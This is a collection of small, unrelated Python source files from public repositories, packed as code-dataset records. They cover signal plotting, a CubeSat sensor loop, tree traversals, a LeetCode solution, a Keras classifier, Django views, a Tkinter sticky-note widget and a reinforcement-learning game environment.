(s)')\nplt.show()\n","repo_name":"sebapastore/digital_modulation","sub_path":"signal_plot.py","file_name":"signal_plot.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20527168385","text":"\"\"\"\nRoutine 
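# signal_plot.py above computes signal power and dB but stops short of the noise
# step its Stack Overflow reference discusses. A sketch of additive white Gaussian
# noise at a chosen SNR, following the usual power-ratio definition:
import numpy as np

def add_awgn(signal, snr_db):
    """Return signal plus white Gaussian noise at the requested SNR in dB."""
    sig_power = np.mean(signal ** 2)
    noise_power = sig_power / (10 ** (snr_db / 10))      # SNR = P_signal / P_noise
    noise = np.random.normal(0.0, np.sqrt(noise_power), size=signal.shape)
    return signal + noise

t = np.linspace(1, 100, 1000)
noisy = add_awgn(10 * np.sin(t / (2 * np.pi)), snr_db=20)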
that configures on-board inertial measurement unit (IMU).\n\"\"\"\nfrom lib.pycubed import cubesat\nimport time\n\n\nwhile True:\n\n # Read acceleration, magnetometer, gyroscope, temperature.\n accel_x, accel_y, accel_z = cubesat.acceleration\n mag_x, mag_y, mag_z = cubesat.magnetic\n gyro_x, gyro_y, gyro_z = cubesat.gyro\n temp = cubesat.temperature\n\n # Print values.\n print(f\"Acc (m/s^2): x: {accel_x}\\ty: {accel_y}\\tz: {accel_z}\")\n print(f\"Mag (uT): x: {mag_x}\\ty: {mag_y}\\tz: {mag_z}\")\n print(f\"Gyro (deg/sec): x: {gyro_x}\\ty: {gyro_y}\\tz: {gyro_z}\")\n print(f\"Temperature: {temp}C\\n\")\n\n # Delay for 1 second\n time.sleep(1)","repo_name":"alxklso/pycubed-software-default","sub_path":"v5-code-examples/imu.py","file_name":"imu.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"74580737154","text":"from key_only_binary_tree import DATA, LEFT, RIGHT, print_tree, tree\nfrom random import shuffle\n\n\ndef tree_insert(tree, data):\n if not tree:\n tree += [data, None, None]\n return\n\n parent = node = tree\n while node != None:\n parent = node\n\n if data < node[DATA]:\n node = node[LEFT]\n elif data > node[DATA]:\n node = node[RIGHT]\n\n if data < parent[DATA]:\n parent[LEFT] = [data, None, None]\n elif data > parent[DATA]:\n parent[RIGHT] = [data, None, None]\n\n\nvisited = []\n\n\ndef tree_dfs(tree):\n if tree == None or tree[DATA] in visited:\n return\n\n print(tree[DATA], end=' ')\n visited.append(tree[DATA])\n tree_dfs(tree[LEFT])\n tree_dfs(tree[RIGHT])\n\n\ndef tree_bfs(tree):\n should_visit = []\n print(tree[DATA], end=' ')\n should_visit.append(tree[LEFT])\n should_visit.append(tree[RIGHT])\n\n while should_visit:\n node = should_visit.pop(0)\n if node == None:\n continue\n print(node[DATA], end=' ')\n\n should_visit.append(node[LEFT])\n should_visit.append(node[RIGHT])\n\n\ndef preorder(tree):\n if tree == None:\n return\n\n print(tree[DATA], end=' ')\n preorder(tree[LEFT])\n preorder(tree[RIGHT])\n\n\ndef inorder(tree):\n if tree == None:\n return\n\n inorder(tree[LEFT])\n print(tree[DATA], end=' ')\n inorder(tree[RIGHT])\n\n\ndef postorder(tree):\n if tree == None:\n return\n\n postorder(tree[LEFT])\n postorder(tree[RIGHT])\n print(tree[DATA], end=' ')\n\n\n# 무작위로 만들어진 이진 탐색 트리를 준비한다.\nNUMBER_OF_NODES = 8\nnumbers = list(range(NUMBER_OF_NODES))\nshuffle(numbers)\n\nfor num in numbers:\n tree_insert(tree, num)\n\nprint_tree(tree)\n\n\nprint('\\nPreorder:')\npreorder(tree)\nprint('\\nInorder:')\ninorder(tree)\nprint('\\nPostorder:')\npostorder(tree)\nprint('\\n너비 우선 탐색:')\ntree_bfs(tree)\nprint('\\n깊이 우선 탐색:')\ntree_dfs(tree)\nprint()\n","repo_name":"lens0021/snippets","sub_path":"tree_searchs.py","file_name":"tree_searchs.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"14297012649","text":"\"\"\"\n268. 
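# tree_searchs.py above recurses for its traversals, which hits Python's recursion
# limit on deep unbalanced trees. The same inorder walk with an explicit stack,
# reusing the record's [DATA, LEFT, RIGHT] list layout:
DATA, LEFT, RIGHT = 0, 1, 2

def inorder_iter(tree):
    out, stack, node = [], [], tree
    while stack or node:
        while node:                       # slide down the left spine
            stack.append(node)
            node = node[LEFT]
        node = stack.pop()
        out.append(node[DATA])            # visit, then cross to the right subtree
        node = node[RIGHT]
    return out

print(inorder_iter([2, [1, None, None], [3, None, None]]))    # [1, 2, 3]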
Missing Number\nhttps://leetcode.com/problems/missing-number/\n\"\"\"\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n\n # Cyclic sort\n # [1] extend nums with new element -1\n # [2] loop i through nums\n # [3] if nums[i] == -1 or i != nums[i], then swap nums[i] and nums[nums[i]], else incrmeent i\n # [4] loop through nums again and return the index of the -1\n # O(n) time and O(1) space\n nums.append(-1)\n i, n = 0, len(nums)\n while i < n:\n j = nums[i]\n if j == -1 or i == j:\n i += 1\n else:\n nums[i], nums[j] = nums[j], nums[i]\n\n for i, v in enumerate(nums):\n if v == -1:\n return i\n\n # Array copy\n # [1] Create an array of all integers in order, all_ints\n # [2] For n in nums set, set all_ints[n] = -1\n # [3] Loop through all_ints and return the first element that is not -1\n # O(n) time and O(n) space\n# all_ints = list(range(len(nums)+1))\n\n# for n in nums:\n# all_ints[n] = -1\n\n# for n in all_ints:\n# if n >= 0:\n# return n","repo_name":"mathvolcano/leetcode","sub_path":"0268_missingNumber.py","file_name":"0268_missingNumber.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16392382770","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten\n\npath_save = 'd:/study_data/_save/men_women/'\n\nmw_x_train = np.load(path_save + 'keras56_mw_x_train.npy')\nmw_x_test = np.load(path_save + 'keras56_mw_x_test.npy')\nmw_y_train = np.load(path_save + 'keras56_mw_y_train.npy')\nmw_y_test = np.load(path_save + 'keras56_mw_y_test.npy')\n\n#모델구성\nmodel = Sequential()\nmodel.add(Conv2D(32, (2, 2), input_shape=(200, 200, 3), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(16, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['acc'])\nhist = model.fit(mw_x_train, mw_y_train, epochs=100,validation_data = (mw_x_test, mw_y_test))\n\nloss = model.evaluate(mw_x_test, mw_y_test)\nprint('loss:', loss)\n\ny_predict = model.predict(mw_x_test)\nfrom sklearn.metrics import accuracy_score\n\nacc = accuracy_score(mw_y_test,np.round(y_predict) )\nprint('acc:', acc)","repo_name":"rlaxoghd0513/study","sub_path":"keras/keras56_4_men_women_load_npy.py","file_name":"keras56_4_men_women_load_npy.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9368870848","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . 
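# The LeetCode 268 record above shows cyclic sort and an O(n)-space copy; the two
# classic O(n)-time / O(1)-space alternatives are a Gauss sum and an XOR fold:
def missing_number_sum(nums):
    n = len(nums)
    return n * (n + 1) // 2 - sum(nums)        # expected total minus actual total

def missing_number_xor(nums):
    acc = len(nums)                            # seed with n, fold in i ^ nums[i]
    for i, v in enumerate(nums):
        acc ^= i ^ v
    return acc

assert missing_number_sum([3, 0, 1]) == missing_number_xor([3, 0, 1]) == 2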
import views\n\n# restaurants/\n# restaurants/1/info\n\n\"\"\"\nrouter = routers.DefaultRouter() # add this\nrouter.register(r'frontend', views.RestaurantView,\n                'front') # add this\n\"\"\"\n\nurlpatterns = [\n    path('', views.index, name=\"restaurants_index\"),\n    path('<int:pk>/info', views.detail, name='restaurants_detail'),  # pattern reconstructed from the '# restaurants/1/info' comment; the original was lost to markup stripping (assumption)\n    path('predict', views.ModelPredict.as_view(), name='predict_result'),\n    path('fetch', views.RestaurantView.as_view(), name='fetch_restaurants'),\n    path('name', views.NameView.as_view(), name='name_restaurants'),\n    path('search', views.SearchView.as_view(), name=\"search_engine_result\")\n]\n\"\"\"\nurlpatterns += router.urls\n\"\"\"\n","repo_name":"KyraZzz/Chatbot_restaurant","sub_path":"py_chatbot/restaurants/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6491071188","text":"from tkinter import Toplevel, Text, Listbox\nfrom tkinter.ttk import Frame, Label, Entry, Button\nfrom collections import defaultdict\n\n\nnum = defaultdict(int)\ndef numerate(pre):\n    \"\"\" A function for making unique IDs\n        'pre' : string\n        Returns a string combining the prefix\n        with a unique number.\n    \"\"\"\n    global num\n    num[pre] += 1\n    return \"{}{}\".format(pre, num[pre])\n\nclass Sticker(Frame):\n    def __init__(self, parent, pos, name):\n        Frame.__init__(self, parent)\n        self.pack()\n        self.parent = parent\n        self.pos = pos\n        self.name = name\n        self.drawing = False\n        self.w_id = None\n        self.size = (250, 220)\n        self.entries = []\n        self.text = []\n        self.my_lines = {}\n        self.links = []\n        self.rect_id = None\n        self.bindings(self)\n\n    def bindings(self, w):\n        # NOTE: the original event names were lost (angle-bracket content was stripped);\n        # these are plausible reconstructions for a drag/draw widget, not the author's originals.\n        w.bind(\"<B1-Motion>\", self.move)\n        w.bind(\"<Button-3>\", self.draw_line)\n        w.bind(\"<ButtonRelease-3>\", self.pair_boxes)\n        w.bind(\"<Motion>\", self.move_line)\n\n\n    def pair_boxes(self, e):\n        if self.drawing:\n            x,y = self.parent.mouse_coords()\n            overlap = self.parent.find_overlapping(x-5, y-5, x+5, y+5)\n            to_be_removed = True\n            if len(overlap) >= 2:\n                for sticky in self.parent.stickies:\n                    if self.parent.stickies[sticky].w_id == overlap[0] and self.w_id != overlap[0]:\n                        self.connect2box(sticky)\n                        self.save_connect(sticky)\n                        to_be_removed = False\n            if to_be_removed:\n                self.parent.delete(self.my_line)\n            self.drawing = False\n\n    def connect2box(self, other, load=False):\n        coords = self.parent.stickies[other].pos\n        if load:\n            self.my_line = self.parent.create_line(self.pos[0], self.pos[1], coords[0], coords[1], fill=\"green\", width=3)\n        else:\n            self.parent.coords(self.my_line, self.pos[0], self.pos[1], coords[0], coords[1])\n        self.my_lines[self.my_line] = [self.pos[0], self.pos[1], coords[0], coords[1]]\n        self.parent.stickies[other].my_lines[self.my_line] = [coords[0], coords[1], self.pos[0], self.pos[1]]\n\n    def save_connect(self, other):\n        if other not in self.links:\n            self.links.append(other)\n        if self.name not in self.parent.stickies[other].links:\n            self.parent.stickies[other].links.append(self.name)\n\n    def draw_line(self, e):\n        self.drawing = True\n        new_x, new_y = self.parent.mouse_coords()\n        self.my_line = self.parent.create_line(self.pos[0], self.pos[1], new_x, new_y, fill=\"green\", width=3)\n\n    def move_line(self, e):\n        if self.drawing:\n            new_x, new_y = self.parent.mouse_coords()\n            self.parent.coords(self.my_line, (self.pos[0], self.pos[1], new_x, new_y))\n    \n    def move(self, e):\n        self.parent.move(self.w_id, e.x, e.y)\n        self.parent.move(self.rect_id, e.x, e.y)\n        self.pos = tuple([int(co) for co in self.parent.coords(self.w_id)])\n        for line in 
self.my_lines.keys():\n self.parent.coords(line, self.pos[0], self.pos[1], self.my_lines[line][2], self.my_lines[line][3])\n for sticky in self.parent.stickies:\n if sticky != self.name:\n if line in self.parent.stickies[sticky].my_lines.keys():\n self.parent.stickies[sticky].my_lines[line][2] = int(self.pos[0])\n self.parent.stickies[sticky].my_lines[line][3] = int(self.pos[1])\n\n def add_entry(self, text):\n entry = Entry(self)\n entry.insert(0, \",\".join(text))\n entry.pack(fill=\"both\", expand=True)\n entry.config(state=\"readonly\")\n self.bindings(entry)\n self.entries.append(entry)\n\n def add_text(self, text):\n w, h = self.size\n field = Text2(self, width=w, height=h)\n field.pack()\n field.insert(\"1.0\", text)\n field.config(state=\"disable\")\n self.bindings(field)\n self.text.append(field)\n\n def add_buttons(self):\n frame = Frame(self)\n frame.pack(fill=\"x\")\n edit = Button(frame, text=\"Edit\", command=self.edit)\n edit.pack(side=\"right\", padx=5, pady=5)\n delete = Button(frame, text=\"Del\", command=self.delete_menu)\n delete.pack(side=\"right\")\n\n def draw_box(self, color=\"green\", box_id=None):\n x1 = self.pos[0]-(self.size[0]/2)\n y1 = self.pos[1]-(self.size[1]/2)\n x2 = x1 + self.size[0]\n y2 = y1 + self.size[1]\n ad = 27 #<--Adjustment variable\n bbox = ((x1, y1-ad), (x2, y2+ad))\n if not box_id:\n self.rect_id = self.parent.create_rectangle(bbox, width=7., outline=color)\n else:\n self.parent.coords(box_id, (x1, y1-ad, x2, y2+ad))\n\n\n def edit(self):\n entries = [field.get() for field in self.entries]\n text = [text.get(\"1.0\", \"end-1c\") for text in self.text]\n links = self.links\n node = self.parent.make_node(self.name, self.pos, (entries, text), links, edit=True)\n\n def delete_menu(self):\n delmenu = Node(self, self.name, self.pos)\n item_list = [\"This box: {}\".format(self.name)]\n for lin in self.links:\n item_list.append(\"The line to: {}\".format(lin))\n delmenu.insert_list(item_list)\n\n def delete_items(self, inx):\n for j in inx:\n if j == 0: #<---Selected the Box.\n self.parent.delete(self.rect_id)\n for link in self.links:\n self.remove_line(link)\n for stick in self.parent.stickies:\n if stick != self.name:\n for link in self.parent.stickies[stick].links:\n if link == self.name:\n self.parent.stickies[stick].links.remove(link)\n del self.parent.stickies[self.name]\n self.destroy()\n else: #<---Selected a line.\n self.remove_line(self.links[j-1])\n self.links.remove(self.links[j-1])\n\n def remove_line(self, node):\n to_be_removed = []\n for stick in self.parent.stickies:\n if self.parent.stickies[stick].name == node:\n for link in self.parent.stickies[stick].links:\n if link == self.name:\n self.parent.stickies[stick].links.remove(link)\n for i in self.parent.stickies[stick].my_lines:\n if i in self.my_lines.keys():\n to_be_removed.append(i)\n for j in to_be_removed:\n del self.parent.stickies[stick].my_lines[j]\n for h in to_be_removed:\n self.parent.delete(h)\n\n\n\n\nclass Node(Toplevel):\n \"\"\" This class is a catchall for all popup windows.\"\"\"\n def __init__(self, parent, name, pos=(0,0), edit=False):\n Toplevel.__init__(self)\n self.parent = parent\n self.name = name\n self.pos = pos\n self.edit = edit\n self.links = []\n self.entries = {\"Entry\":{}, \"Text\":{}}\n self.resizable(0,0)\n self.frame = Frame(self)\n self.frame.pack(side=\"right\", fill=\"y\", expand=True)\n\n def save(self):\n for i in self.entries[\"Entry\"]:\n entry = self.entries[\"Entry\"][i].get()\n entr_list = entry.split(\",\")\n 
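# write the parsed list back so save_info receives lists rather than raw strings\n            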
self.entries[\"Entry\"][i] = entr_list\n for i in self.entries[\"Text\"]:\n self.entries[\"Text\"][i] = self.entries[\"Text\"][i].get(\"1.0\", \"end-1c\")\n self.destroy()\n self.parent.save_info(self.name, self.entries, self.pos, self.links, self.edit)\n\n def ok_cancel_buttons(self, call=None):\n if not call:\n call = self.save\n button_frame = Frame(self.frame)\n ok_button = Button(button_frame, text=\"Ok\", command=call)\n cancel_button = Button(button_frame, text=\"Cancel\", command=self.destroy)\n button_frame.pack(fill=\"x\")\n cancel_button.pack(side=\"right\", padx=5, pady=5)\n ok_button.pack(side=\"right\")\n\n def insert_list(self, items):\n frame = self.frame\n frame.pack(fill=\"y\")\n lb = Listbox(frame, selectmode=\"multiple\")\n for i in items:\n lb.insert(\"end\", i)\n lb.pack()\n self.ok_cancel_buttons(call=lambda : self.del_items(lb.curselection()))\n\n def del_items(self, selection):\n self.parent.delete_items(selection)\n self.destroy()\n\n def insert_entry_field(self, txt, default=None, focus=False):\n frame = Frame(self.frame)\n frame.pack(fill=\"x\")\n label = Label(frame, text=txt, width=6)\n label.pack(side=\"left\", anchor=\"n\", padx=5, pady=5)\n entry = Entry(frame)\n entry.pack(fill=\"x\", padx=5, pady=5, expand=True)\n if default:\n for i in default:\n entry.insert(\"end\", i)\n if focus:\n entry.focus_force()\n self.entries[\"Entry\"][txt] = entry\n\n def insert_text_field(self, txt, default=None):\n frame = Frame(self.frame)\n frame.pack(fill=\"x\")\n label = Label(frame, text=txt, width=6)\n label.pack(side=\"left\", anchor=\"n\", padx=5, pady=5)\n entry = Text(frame)\n entry.pack(fill=\"both\", pady=5, padx=5, expand=True)\n if default:\n for i in default:\n entry.insert(\"end\", i)\n self.entries[\"Text\"][txt] = entry\n\nclass Text2(Frame):\n def __init__(self, master, width=0, height=0, sid=None, **kwargs):\n Frame.__init__(self, master, width=width, height=height)\n self.master = master\n self.width = width\n self.height = height\n self.sid = sid\n self.text_widget = Text(self, **kwargs)\n self.text_widget.pack(expand=True, fill=\"both\")\n\n def insert(self, *args, **kwargs):\n self.text_widget.insert(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n self.text_widget.delete(*args, **kwargs)\n\n def config(self, *args, **kwargs):\n self.text_widget.config(*args, **kwargs)\n\n def get(self, *args, **kwargs):\n return self.text_widget.get(*args, **kwargs)\n\n def bind(self, *args, **kwargs):\n self.text_widget.bind(*args, **kwargs)\n\n def bindtags(self, *args, **kwargs):\n self.text_widget.bind(*args, **kwargs)\n\n def pack(self, *args, **kwargs):\n Frame.pack(self, *args, **kwargs)\n self.pack_propagate(False)\n\n def grid(self, *args, **kwargs):\n Frame.grid(self, *args, **kwargs)\n self.grid_propagate(False)\n","repo_name":"Exodus111/Projects","sub_path":"Games/Tools/Writing-Tool/mod_items.py","file_name":"mod_items.py","file_ext":"py","file_size_in_byte":10642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28147298103","text":"from config import *\r\n\r\n\r\ndef get_wordarray(input):\r\n params = {'string': input, 'language': language}\r\n response = requests.get(request_path, params,\r\n headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n # convert text response to json array\r\n json_array = json.loads(response.text[2:])\r\n print(\"Guess array: \", json_array['data'])\r\n guess_array = json_array['data']\r\n return 
guess_array\r\n\r\n\r\ndef get_basearray(guess):\r\n    params = {'string': guess, 'language': \"Telugu\"}\r\n    response_basechars = requests.get(request_basecharpath, params,\r\n                                      headers={\r\n                                          'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n\r\n    # convert text response to json array\r\n    json_guessbasechararray = json.loads(response_basechars.text[2:])\r\n    print(json_guessbasechararray)\r\n    print(\"json_guessbasechararray['data']: \", json_guessbasechararray['data'])\r\n    base_array = json_guessbasechararray['data']\r\n    print(\"guess base array length: \", len(base_array))\r\n    return base_array\r\n\r\n# validate user custom input\r\ndef custom_input_check(input):\r\n    # flag = True\r\n    global guess_array\r\n    global word_length\r\n\r\n    guess_array = get_wordarray(input)\r\n    session['guess_array'] = guess_array\r\n    word_length = len(guess_array)\r\n    print(\"Word length: \", word_length)\r\n    print(\"Guess array length: \", len(guess_array))\r\n\r\n    flag = check_for_duplicate_letters(guess_array)\r\n\r\n    return flag\r\n\r\n\r\ndef check_for_duplicate_letters(guess_array):\r\n    flag = True\r\n    for char in guess_array:\r\n        print(\"character count: \", char, guess_array.count(char))\r\n        if guess_array.count(char) > 1:\r\n            flag = False\r\n\r\n    return flag\r\n","repo_name":"sjasthi/animals_python","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18628585217","text":"COST=input(\"please tell me your cost(RMB) : \")\nCOSTE=float(COST)\nTTC=COSTE*115/100\nTTCE=str(TTC)\nprint(\"so you need to pay me\",TTCE,\"RMB\")\nPAY=input(\"so, you are going to pay(RMB) : \")\nPAYE=float(PAY)\nCHANGE=PAYE-TTC  # subtract the numeric total, not its string form\nCHANGEE=float(CHANGE)\nprint(\"here is your change,\",CHANGEE,\"RMB\")\n","repo_name":"EEExphon/Basic_Codes_for_Python","sub_path":"INT FLOAT/Cost And Change.py","file_name":"Cost And Change.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74230572354","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom cart.models import *\nfrom .serializers import *\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef add_product(request):\n    \"\"\" Response element to js script + \"\"\"\n\n    if request.method == 'POST':\n        body = request.data\n        product = Product.objects.get(pk=body['id'])\n        serializer = ProductSerializer(product)\n\n        request.session['cart'][body['id']] = serializer.data\n        request.session.save()\n        print(request.session['cart'])\n        return Response(serializer.data)\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef delete_product(request):\n    \"\"\" Response element to js script for deleting \"\"\"\n\n    if request.method == 'POST':\n\n        body = request.data\n        del request.session['cart'][body['id']]\n        request.session.save()\n\n        return Response()\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef clear_cart(request):\n    \"\"\" Response element to js script for deleting + \"\"\"\n\n    if request.method == 'POST':\n        request.session['cart'] = {}\n\n    return Response()\n\n\n@api_view(['GET'])\ndef update_session(request):\n    \"\"\" Update cart. 
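Ensures the session cart exists and returns its current items. 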
+ \"\"\"\n if request.method == 'GET':\n\n session_key = request.session.session_key\n if 'cart' not in request.session:\n request.session['cart'] = {}\n if not session_key:\n request.session.cycle_key()\n\n\n else:\n\n active_goods = []\n for Value in request.session['cart']:\n active_goods.append(request.session['cart'][Value])\n\n return Response(active_goods)\n\n\n@api_view(['POST'])\ndef complete_cart(request):\n \"\"\" add cart. + \"\"\"\n if request.method == 'POST':\n\n new_order = Order.objects.create(customer_name='Alex', is_active=True, stage=StageGeneration.base)\n for value in request.session['cart']:\n ProductInOrder.objects.create(order=new_order, product=Product.objects.get(id=value))\n request.session['cart'] = {}\n return Response()\n","repo_name":"LexaVopper/MiniShop","sub_path":"Shop/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1653818910","text":"import pathlib\nimport pickle\nimport sys\nimport queue\nimport threading\nfrom typing import Any, Callable, Dict, List, NamedTuple, Tuple, Union, Optional, Type\n\nimport torch\nimport torch.nn as nn\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sb3_contrib import QRDQN\nfrom stable_baselines3 import DQN, PPO\nfrom stable_baselines3.dqn.policies import QNetwork, DQNPolicy\nfrom stable_baselines3.common.callbacks import BaseCallback, CheckpointCallback, EveryNTimesteps\nfrom stable_baselines3.common.logger import TensorBoardOutputFormat\n\nfrom plot import moving_average\n\n\nGymObs = Union[Tuple, Dict, np.ndarray, int]\n\n\nenv_queue = queue.Queue() # Input observation\naction_queue = queue.Queue() # Output action\n\nN_EXTRA_FEATURES = 1 + 2\nINPUT_SIZE = 6*2 + 1 + 3 + 6 + 1 + 1 + N_EXTRA_FEATURES\nOUT_SIZE = 3\n\nKYS_FLAG = \"kys\"\nGAME_OVER_FLAG = \"game_over\"\nENV_STATE_FLAG = \"env_state\"\n\n\ndef latest_checkpoint(path):\n path = pathlib.Path(path)\n checkpoints = list(path.glob(\"*_steps.zip\"))\n if len(checkpoints) > 0:\n n, p = max([(int(p.stem.rsplit('_')[2]), p) for p in checkpoints])\n replay_buffers = list(path.glob(f\"*_replay_buffer_{n}_steps.pkl\"))\n if len(replay_buffers) > 0:\n return p, replay_buffers[0]\n return p, None\n return None\n\n\ndef get_env_queue():\n flag, value = env_queue.get()\n if flag == KYS_FLAG:\n return sys.exit() # Exit the learner thread only\n return flag, value\n\n\ndef create_dropout_mlp(\n input_dim: int,\n output_dim: int,\n net_arch: List[int],\n dropout_arch: List[float],\n activation_fn: Type[nn.Module] = nn.ReLU,\n squash_output: bool = False,\n) -> List[nn.Module]:\n if len(net_arch) > 0:\n modules = [nn.Linear(input_dim, net_arch[0]), activation_fn(), nn.Dropout(dropout_arch[0])]\n else:\n modules = []\n\n for idx in range(len(net_arch) - 1):\n modules.append(nn.Linear(net_arch[idx], net_arch[idx + 1]))\n modules.append(activation_fn())\n modules.append(nn.Dropout(dropout_arch[idx + 1]))\n\n if output_dim > 0:\n last_layer_dim = net_arch[-1] if len(net_arch) > 0 else input_dim\n modules.append(nn.Linear(last_layer_dim, output_dim))\n if squash_output:\n modules.append(nn.Tanh())\n return modules\n\nclass CustomQNetwork(QNetwork):\n def __init__(\n self,\n observation_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n features_extractor: nn.Module,\n features_dim: int,\n net_arch: Optional[List[int]] = None,\n activation_fn: Type[nn.Module] = nn.ReLU,\n normalize_images: bool = True,\n ):\n 
super().__init__(observation_space, action_space, features_extractor, features_dim, \n            net_arch=net_arch, activation_fn=activation_fn, normalize_images=normalize_images)\n\n        dropout_arch = [0.097, 0.11]\n        q_net = create_dropout_mlp(self.features_dim, self.action_space.n, [115, 97], dropout_arch, nn.ReLU)\n        # q_net = create_dropout_mlp(self.features_dim, self.action_space.n, self.net_arch, dropout_arch, self.activation_fn)\n        self.q_net = nn.Sequential(*q_net)\n        self.q_net.load_state_dict(torch.load(\"pretrained.pth\"))\n\nclass CustomDQNPolicy(DQNPolicy):\n    def make_q_net(self):\n        # Make sure we always have separate networks for features extractors etc\n        net_args = self._update_features_extractor(self.net_args, features_extractor=None)\n        return CustomQNetwork(**net_args).to(self.device)\n\n\nclass SupaEnv(gym.Env):\n    # TODO use rl_zoo3 frame skipping wrapper\n    def __init__(self, hparams: dict = None):\n        super(SupaEnv, self).__init__()\n        self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(INPUT_SIZE,))\n        self.action_space = gym.spaces.Discrete(OUT_SIZE)\n\n        self.last_state = None \n        self.real_episode_scores = []\n        self.hparams = {\n            \"reward_slot_center\": False, # Receive reward for being close to the center of a slot\n            \"reward_slot_center_amount\": 0,\n            \"reward_far_wall\": True, # Receive reward for being on a slot where the wall is far away\n            \"reward_far_wall_amount\": 0.8255774334211466,\n            \"reward_interval\": 60, # Receive interval_reward reward after this many successful steps\n            \"interval_reward\": 0,\n            \"default_reward\": 0, # Receive reward each step\n            \"loss_reward\": -1, # Reward when game over\n        }\n        if hparams:\n            self.hparams.update(hparams)\n        for attr, value in self.hparams.items():\n            setattr(self, attr, value)\n        self.frame_number = 0\n\n    def reset(self) -> GymObs:\n        \"\"\"\n        Called at the beginning of an episode.\n        :return: the first observation of the episode\n        \"\"\"\n        flag, state = get_env_queue()\n        state_struct = self.state_to_struct(state)\n        state_struct = self.add_state_features(state_struct)\n        state = state_struct[\"_packed\"]\n        self.last_state = state\n        self.frame_number = 1\n        return state\n\n    def step(self, action: Union[int, np.ndarray]) -> Tuple[GymObs, float, bool, Dict]:\n        \"\"\"\n        Step into the environment.\n        :return: A tuple containing the new observation, the reward signal, \n            whether the episode is over and additional information.\n        \"\"\"\n        action_queue.put(action)\n        flag, state = get_env_queue()\n        if flag == GAME_OVER_FLAG:\n            self.real_episode_scores.append(state)\n            state = self.last_state\n            reward = self.loss_reward\n            done = True\n        elif flag == ENV_STATE_FLAG:\n            state_struct = self.state_to_struct(state)\n            state_struct = self.add_state_features(state_struct)\n            state = state_struct[\"_packed\"]\n            self.last_state = state\n            self.frame_number += 1\n            reward = self.get_reward(state_struct)\n            done = False\n        else:\n            raise ValueError(f\"Unknown flag {flag}\")\n        info = {}\n        return state, reward, done, info\n\n    def get_reward(self, state_struct: dict) -> float:\n        reward = self.default_reward\n        # Reward shaping\n        if self.frame_number % self.reward_interval == 0:\n            reward += self.interval_reward\n        if self.reward_slot_center:\n            reward += self.reward_slot_center_amount * pow(1 - abs(state_struct[\"center_offset\"]), 4)\n        if self.reward_far_wall:\n            wall_dist, wall_width = self.get_cur_wall_dist(state_struct)\n            reward += self.reward_far_wall_amount * wall_dist\n        return reward\n\n    @staticmethod\n    def add_state_features(state_struct: dict) -> dict:\n        # 
Add extra features to the input\n        center_offset = SupaEnv.get_cur_center_offset(state_struct)\n        state_struct[\"center_offset\"] = center_offset\n        state_struct[\"_packed\"].append(center_offset)\n        phi = state_struct[\"player_pos\"] / state_struct[\"n_slots\"] * 2 * np.pi\n        state_struct[\"pos_x\"] = np.cos(phi)\n        state_struct[\"pos_y\"] = np.sin(phi)\n        state_struct[\"_packed\"].append(state_struct[\"pos_x\"])\n        state_struct[\"_packed\"].append(state_struct[\"pos_y\"])\n        return state_struct\n\n    @staticmethod\n    def state_to_struct(state: list) -> dict:\n        # This function must be defined based on the C++ GameState_DQN struct.\n        walls = np.array(state[:12]).reshape(6, 2)\n        wall_speed = state[12]\n        n_slots = state[13:16].index(1) + 4\n        cur_slot = next(i for i, x in enumerate(state[16:16+6]) if x > 0)\n        return {\n            \"_packed\": state,\n            \"walls\": walls,\n            \"wall_speed\": wall_speed,\n            \"n_slots\": n_slots,\n            \"cur_slot\": cur_slot,\n            \"player_pos\": state[22] * n_slots,\n            \"world_rotation\": state[23],\n        }\n\n    @staticmethod\n    def get_cur_wall_dist(state_struct: dict) -> tuple:\n        dist, width = state_struct[\"walls\"][state_struct[\"cur_slot\"]]\n        return dist, width\n\n    @staticmethod\n    def get_cur_center_offset(state_struct: dict) -> float:\n        # -1: left edge, 0: center, 1: right edge\n        pos = 